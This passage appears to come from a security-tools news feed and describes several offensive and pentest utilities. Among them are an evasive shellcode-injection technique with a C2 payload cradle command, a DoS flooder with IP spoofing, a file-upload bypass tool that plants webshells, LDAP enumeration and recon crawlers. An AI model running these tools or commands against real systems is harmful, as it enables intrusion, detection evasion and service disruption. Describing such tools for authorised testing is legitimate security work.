  2. Shellcode execution using function pointer. This helps in avoid a new thread creation or calling unusual function callbacks.
  3. restoring of original dll content over the executed shellcode. This is a key difference.

The differences between Module Shifting and Module Overloading are the following:

  1. The PE can be written starting from a specified section instead of starting from the PE of the hosting dll. Once the target section is chosen carefully, this can reduce the amount of IoCs generated (i.e. PE header of the hosting dll is not overwritten or less bytes overwritten on .text section etc.)
  2. Padding that can be added to the PE payload itself to better blend into false positives.

Using a functionally independent shellcode payload such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to locally inject without dynamically allocating memory and at the moment generating zero IoC on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case what is enabling more stealthiness in the injection is the shellcode functional independence, so that the written malicious bytes can be restored to its original content, effectively erasing the traces of the injection.

Disclaimer

All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

Credits

This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.

Usage

ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.

  1. Clone the Pyramid repo:

git clone https://github.com/naksyn/Pyramid

  1. Generate a shellcode payload with your preferred C2 and drop it into Pyramid Delivery_files folder. See Caveats section for payload requirements.
  2. modify the parameters of moduleshifting.py script inside Pyramid Modules folder.
  3. Start the Pyramid server: python3 pyramid.py -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server 192.168.1.2 -setcradle moduleshifting.py
  4. execute the generated cradle code on a python interpreter.

Caveats

To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, so breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. So the initial shellcode becomes useless once executed and there's no reason to keep it in memory as an IoC.

A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.

Detection opportunities

Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.



ICMPWatch - ICMP Packet Sniffer

By: Zion3R


ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.


Features

  • Capture and analyze ICMP Echo Request and Echo Reply packets.
  • Display detailed information about each ICMP packet, including source and destination IP addresses, MAC addresses, packet size, ICMP type, and payload content.
  • Save captured packet information to a text file.
  • Store captured packet information in an SQLite database.
  • Save captured packets to a PCAP file for further analysis.
  • Support for custom packet filtering based on source and destination IP addresses.
  • Colorful console output using ANSI escape codes.
  • User-friendly command-line interface.

Requirements

  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher

Installation

  1. Clone this repository:
git clone https://github.com/HalilDeniz/ICMPWatch.git
  1. Install the required dependencies:
pip install -r requirements.txt

Usage

python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
  • -v or --verbose: Show verbose packet details.
  • -t or --timeout: Sniffing timeout in seconds (default is 300 seconds).
  • -f or --filter: BPF filter for packet sniffing (default is "icmp").
  • -o or --output: Output file to save captured packets.
  • --type: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).
  • --src-ip: Source IP address to filter.
  • --dst-ip: Destination IP address to filter.
  • -i or --interface: Network interface to capture packets (required).
  • -db or --database: Store captured packets in an SQLite database.
  • -c or --capture: Capture file to save packets in pcap format.

Press Ctrl+C to stop the sniffing process.

Examples

  • Capture ICMP packets on the "eth0" interface:
python icmpwatch.py -i eth0
  • Sniff ICMP traffic on interface "eth0" and save the results to a file:
python dnssnif.py -i eth0 -o icmp_results.txt
  • Filtering by Source and Destination IP:
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
  • Filtering ICMP Echo Requests:
python icmpwatch.py -i eth0 --type 8
  • Saving Captured Packets
python icmpwatch.py -i eth0 -c captured_packets.pcap


DoSinator - A Powerful Denial Of Service (DoS) Testing Tool

By: Zion3R


DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats.Β 


Features

  • Multiple Attack Modes: DoSinator supports SYN Flood, UDP Flood, and ICMP Flood attack modes, allowing you to simulate various types of DoS attacks.
  • Customizable Parameters: Adjust the packet size, attack rate, and duration to fine-tune the intensity and duration of the attack.
  • IP Spoofing: Enable IP spoofing to mask the source IP address and enhance anonymity during the attack.
  • Multithreaded Packet Sending: Utilize multiple threads for simultaneous packet sending, maximizing the attack speed and efficiency.

Requirements

  • Python 3.x
  • scapy
  • argparse

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/DoSinator.git
  2. Navigate to the project directory:

    cd DoSinator
  3. Install the required dependencies:

    pip install -r requirements.txt

Usage

packets to send (default: 500). -ps PACKET_SIZE, --packet_size PACKET_SIZE Packet size in bytes (default: 64). -ar ATTACK_RATE, --attack_rate ATTACK_RATE Attack rate in packets per second (default: 10). -d DURATION, --duration DURATION Duration of the attack in seconds. -am {syn,udp,icmp,http,dns}, --attack-mode {syn,udp,icmp,http,dns} Attack mode (default: syn). -sp SPOOF_IP, --spoof-ip SPOOF_IP Spoof IP address. --data DATA Custom data string to send." dir="auto">
usage: dos_tool.py [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]

optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,htt p,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
  • target_ip: IP address of the target system.
  • target_port: Port number of the target service.
  • num_packets: Number of packets to send (default: 500).
  • packet_size: Size of each packet in bytes (default: 64).
  • attack_rate: Attack rate in packets/second (default: 10).
  • duration: Duration of the attack in seconds.
  • attack_mode: Attack mode: syn, udp, icmp, http (default: syn).
  • spoof_ip: Spoof IP address (default: None).
  • data: Custom data string to send.

Disclaimer

The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.

By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.

Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.

Contributing

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

Contact

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:



Kali Linux 2023.3 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2023.3. This release has various impressive updates.


The highlights of the changelog since the 2023.2 release from May:

Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

By: Zion3R


xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.


Features

  • Fetches domains from curated passive sources to maximize results.

  • Supports stdin and stdout for easy integration into workflows.

  • Cross-Platform (Windows, Linux & macOS).

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xsubfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xsubfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xsubfind3r.git 
  • Build the utility

     cd xsubfind3r/cmd/xsubfind3r && \
    go build .
  • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

Example config.yaml:

version: 0.3.0
sources:
- alienvault
- anubis
- bevigil
- chaos
- commoncrawl
- crtsh
- fullhunt
- github
- hackertarget
- intelx
- shodan
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
chaos:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
fullhunt:
- 0d9652ce-516c-4315-b589-9b241ee6dc24
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xsubfind3r use the -h flag:

xsubfind3r -h

help message:


_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

USAGE:
xsubfind3r [OPTIONS]

INPUT:
-d, --domain string[] target domains
-l, --list string target domains' list file path

SOURCES:
--sources bool list supported sources
-u, --sources-to-use string[] comma(,) separeted sources to use
-e, --sources-to-exclude string[] comma(,) separeted sources to exclude

OPTIMIZATION:
-t, --threads int number of threads (default: 50)

OUTPUT:
--no-color bool disable colored output
-o, --output string output subdomains' file path
-O, --output-directory string output subdomains' directory path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)

Contribution

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



Redeye - A Tool Intended To Help You Manage Your Data During A Pentest Operation

By: Zion3R


This project was built by pentesters for pentesters. Redeye is a tool intended to help you manage your data during a pentest operation in the most efficient and organized way.


The Developers

Daniel Arad - @dandan_arad && Elad Pticha - @elad_pt

Overview

The Server panel will display all added server and basic information about the server such as: owned user, open port and if has been pwned.


After entering the server, An edit panel will appear. We can add new users found on the server, Found vulnerabilities and add relevant attain and files.


Users panel contains all found users from all servers, The users are categorized by permission level and type. Those details can be chaned by hovering on the username.


Files panel will display all the files from the current pentest. A team member can upload and download those files.


Attack vector panel will display all found attack vectors with Severity/Plausibility/Risk graphs.


PreReport panel will contain all the screenshots from the current pentest.


Graph panel will contain all of the Users and Servers and the relationship between them.


APIs allow users to effortlessly retrieve data by making simple API requests.


curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/users --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/exploits --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq

Installation

Docker

Pull from GitHub container registry.

git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
docker-compose up -d

Start/Stop the container

sudo docker-compose start/stop

Save/Load Redeye

docker save ghcr.io/redeye-framework/redeye:latest neo4j:4.4.9 > Redeye.tar
docker load < Redeye.tar

GitHub container registry: https://github.com/redeye-framework/Redeye/pkgs/container/redeye

Source

git clone https://github.com/redeye-framework/Redeye.git
cd Redeye
sudo apt install python3.8-venv
python3 -m venv RedeyeVirtualEnv
source RedeyeVirtualEnv/bin/activate
pip3 install -r requirements.txt
python3 RedDB/db.py
python3 redeye.py --safe

General

Redeye will listen on: http://0.0.0.0:8443
Default Credentials:

  • username: redeye
  • password: redeye

Neo4j will listen on: http://0.0.0.0:7474
Default Credentials:

  • username: neo4j
  • password: redeye

Special-Thanks

  • Yoav Danino for mental support and beta testing.

Credits

If you own any Code/File in Redeye that is not under MIT License please contact us at: redeye.framework@gmail.com



Xcrawl3R - A CLI Utility To Recursively Crawl Webpages

By: Zion3R


xcrawl3r is a command-line interface (CLI) utility to recursively crawl webpages i.e systematically browse webpages' URLs and follow links to discover linked webpages' URLs.


Features

  • Recursively crawls webpages for URLs.
  • Parses URLs from files (.js, .json, .xml, .csv, .txt & .map).
  • Parses URLs from robots.txt.
  • Parses URLs from sitemaps.
  • Renders pages (including Single Page Applications such as Angular and React).
  • Cross-Platform (Windows, Linux & macOS)

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xcrawl3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r executable.

...move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xcrawl3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xcrawl3r/cmd/xcrawl3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xcrawl3r.git 
  • Build the utility

     cd xcrawl3r/cmd/xcrawl3r && \
    go build .
  • Move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xcrawl3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

NOTE: While the development version is a good way to take a peek at xcrawl3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Usage

To display help message for xcrawl3r use the -h flag:

xcrawl3r -h

help message:

                             _ _____      
__ _____ _ __ __ ___ _| |___ / _ __
\ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
> < (__| | | (_| |\ V V /| |___) | |
/_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0

A CLI utility to recursively crawl webpages.

USAGE:
xcrawl3r [OPTIONS]

INPUT:
-d, --domain string domain to match URLs
--include-subdomains bool match subdomains' URLs
-s, --seeds string seed URLs file (use `-` to get from stdin)
-u, --url string URL to crawl

CONFIGURATION:
--depth int maximum depth to crawl (default 3)
TIP: set it to `0` for infinite recursion
--headless bool If true the browser will be displayed while crawling.
-H, --headers string[] custom header to include in requests
e.g. -H 'Referer: http://example.com/'
TIP: use multiple flag to set multiple headers
--proxy string[] Proxy URL (e.g: http://127.0.0.1:8080)
TIP: use multiple flag to set multiple proxies
--render bool utilize a headless chrome instance to render pages
--timeout int time to wait for request in seconds (default: 10)
--user-agent string User Agent to use (default: web)
TIP: use `web` for a random web user-agent,
`mobile` for a random mobile user-agent,
or you can set your specific user-agent.

RATE LIMIT:
-c, --concurrency int number of concurrent fetchers to use (default 10)
--delay int delay between each request in seconds
--max-random-delay int maximux extra randomized delay added to `--dalay` (default: 1s)
-p, --parallelism int number of concurrent URLs to process (default: 10)

OUTPUT:
--debug bool enable debug mode (default: false)
-m, --monochrome bool coloring: no colored output mode
-o, --output string output file to write found URLs
-v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.

Credits



Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

By: Zion3R


xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.


Features

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xurlfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xurlfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xurlfind3r.git 
  • Build the utility

     cd xurlfind3r/cmd/xurlfind3r && \
    go build .
  • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xurlfind3r will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

Example config.yaml:

version: 0.2.0
sources:
- bevigil
- commoncrawl
- github
- intelx
- otx
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xurlfind3r use the -h flag:

xurlfind3r -h

help message:

                 _  __ _           _ _____      
__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

USAGE:
xurlfind3r [OPTIONS]

TARGET:
-d, --domain string (sub)domain to match URLs

SCOPE:
--include-subdomains bool match subdomain's URLs

SOURCES:
-s, --sources bool list sources
-u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
--skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
--skip-wayback-source bool with wayback , skip parsing source code snapshots

FILTER & MATCH:
-f, --filter string regex to filter URLs
-m, --match string regex to match URLs

OUTPUT:
--no-color bool no color mode
-o, --output string output URLs file path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

Examples

Basic

xurlfind3r -d hackerone.com --include-subdomains

Filter Regex

# filter images
xurlfind3r -d hackerone.com --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'

Match Regex

# match js URLs
xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



Upload_Bypass - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques Covered In Hacktricks

By: Zion3R


Upload_Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.

  • Simplifies the identification and exploitation of vulnerabilities in file upload mechanisms.
  • Leverages bug bounty techniques to maximize testing effectiveness.
  • Enables thorough assessments of web applications.
  • Provides an intuitive and user-friendly interface.
  • Enhances security assessments and helps protect critical systems.

New PoC Video:

Disclaimer

Please note that the use of Upload_Bypass and any actions taken with it are solely at your own risk. The tool is provided for educational and testing purposes only. The developer of Upload_Bypass is not responsible for any misuse, damage, or illegal activities caused by its usage.

While Upload_Bypass aims to assist Pentesters and Bug Hunters in testing file upload mechanisms, it is essential to obtain proper authorization and adhere to applicable laws and regulations before performing any security assessments. Always ensure that you have the necessary permissions from the relevant stakeholders before conducting any testing activities.

The results and findings obtained from using Upload_Bypass should be communicated responsibly and in accordance with established disclosure processes. It is crucial to respect the privacy and integrity of the tested systems and refrain from causing harm or disruption.

By using Upload_Bypass, you acknowledge that the developer cannot be held liable for any consequences resulting from its use. Use the tool responsibly and ethically to promote the security and integrity of web applications.

Features

  1. Webshell mode: The tool will try to upload a Webshell with a random name, and if the user specifies the location of the uploaded file, the tool enters an "Interactive shell".
  2. Eicar mode: The tool will try to upload an Eicar(Anti-Malware test file) instead of a Webshell, and if the user specifies the location of the uploaded file, the tool will check if the file uploaded successfully and exists in the system in order to determine if an Anti-Malware is present on the system.
  3. A directory with the name of the tested host will be created in the Tool's directory upon success, with the results saved in Excel and Text files.

Download:

Download the latest version from Releases page.

Installation:

pip install -r requirements.txt

Limitations:

The tool will not function properly if the file upload mechanism includes CAPTCHA implementation.

Perhaps in the future the tool will include an OCR.

Usage:

Attension

The Tool is compatible exclusively with output file requests generated by Burp Suite.

Before saving the Burp file, replace the file content with the string *content* and filename.ext with the string *filename* and Content-Type header with *mimetype*(only if the tool is not able to recognize it automatically).

How a request should look before the changes:


How it should look after the changes:


If the tool fails to recognize the mime type automatically, you can add *mimetype* in the parameter's value of the Content-Type header.

Options: -h, --help

 show this help message and exit

-b BURP_FILE, --burp-file BURP_FILE

 Required - Read from a Burp Suite file
Usage: -b / --burp-file ~/Desktop/output

-s SUCCESS_MESSAGE, --success SUCCESS_MESSAGE

 Required if -f is not set - Provide the success message when a file is uploaded
Usage: -s /--success 'File uploaded successfully.'

-f FAILURE_MESSAGE, --failure FAILURE_MESSAGE

 Required if -s is not set - Provide a failure message when a file is uploaded
Usage: -f /--failure 'File is not allowed!'

-e FILE_EXTENSION, --extension FILE_EXTENSION

 Required - Provide server backend extension
Usage: -e / --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)

-a ALLOWED_EXTENSIONS, --allowed ALLOWED_EXTENSIONS

 Required - Provide allowed extensions to be uploaded
Usage: -a /--allowed jpeg, png, zip, etc'

-l WEBSHELL_LOCATION, --location WEBSHELL_LOCATION

  Provide a remote path where the WebShell will be uploaded (won't work if the file will be uploaded with a UUID).
Usage: -l / --location /uploads/

-rl NUMBER, --rate-limit NUMBER

  Set rate-limiting with milliseconds between each request.
Usage: -r / --rate-limit 700

-p PROXY_NUM, --proxy PROXY_NUM

  Channel the HTTP requests via proxy client (i.e Burp Suite).
Usage: -p / --proxy http://127.0.0.1:8080

-S, --ssl

  If set, the tool will not validate TLS/SSL certificate.
Usage: -S / --ssl

-c, --continue

  If set, the brute force will continue even if one of the methods gets a hit!
Usage: -C /--continue

-E, --eicar

  If set, an Eicar file(Anti Malware Testfile) will be uploaded only. WebShells will not be uploaded (Suitable for real environments).
Usage: -E / --eicar

-v, --verbose

  If set, details about the test will be printed on the screen
Usage: -v / --verbose

-r, --response

  If set, HTTP response will be printed on the screen
Usage: -r / --response

--version

  Print the current version of the tool.     

--update

  Checks for new updates. If there is a new update, it will be downloaded and updated automatically.     

Examples

Running the tool with Eicar and Bruteforce mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e php -a jpeg --response -v --eicar --continue

Running the tool with Webshell mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e asp -a zip -v

Running the tool with a Proxy client

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e jsp -a png -v --proxy http://127.0.0.1:8080


Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

By: Zion3R


Easy and customisable pentest report creator based on simple web technologies.

SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


Your Benefits

Write in markdown
Design in HTML/VueJS
Render your report to PDF
Fully customizable
Self-hosted or Cloud
No need for Word

SysReptor Cloud

You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

οš€
Sign up here


SysReptor Self-Hosted

You prefer self-hosting? That's fine! You will need:

  • Ubuntu
  • Latest Docker (with docker-compose-plugin)

You can then install SysReptor with via script:

curl -s https://docs.sysreptor.com/install.sh | bash

After successful installation, access your application at http://localhost:8000/.

Get detailed installation instructions at Installation.





msLDAPDump - LDAP Enumeration Tool

By: Zion3R


msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping the lpap3 library from Python in an easy-to-use interface. Like most of my tools, this one works best on Windows. If using Unix, the tool will not resolve hostnames that are not accessible via eth0 currently.


Binding Anonymously

Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, domain controller hostnames, and more.

Credentialed Bind

Users can bind to LDAP utilizing valid user account credentials or a valid NTLM hash. Using credentials will obtain the same information as the anonymously binded request, as well as checking for the following:
  • Subnet scan for systems with ports 389 and 636 open
  • Basic Domain Info (Current user permissions, domain SID, password policy, machine account quota)
  • Users
  • Groups
  • Kerberoastable Accounts
  • ASREPRoastable Accounts
  • Constrained Delegation
  • Unconstrained Delegation
  • Computer Accounts - will also attempt DNS lookups on the hostname to identify IP addresses
  • Identify Domain Controllers
  • Identify Servers
  • Identify Deprecated Operating Systems
  • Identify MSSQL Servers
  • Identify Exchange Servers
  • Group Policy Objects (GPO)
  • Passwords in User description fields

Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.

  • Add support for LDAPS (LDAP Secure)
  • NTLM Authentication
  • Figure out why Unix only allows one adapter to make a call out to the LDAP server (removed resolution from Linux until resolved)
  • Add support for querying child domain information (currently does not respond nicely to querying child domain controllers)
  • Figure out how to link the name to the Description field dump at the end of the script
  • mplement command line options rather than inputs
  • Check for deprecated operating systems in the domain

Mandatory Disclaimer

Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.



Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R


This tools is very helpful for finding vulnerabilities present in the Web Applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
    • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
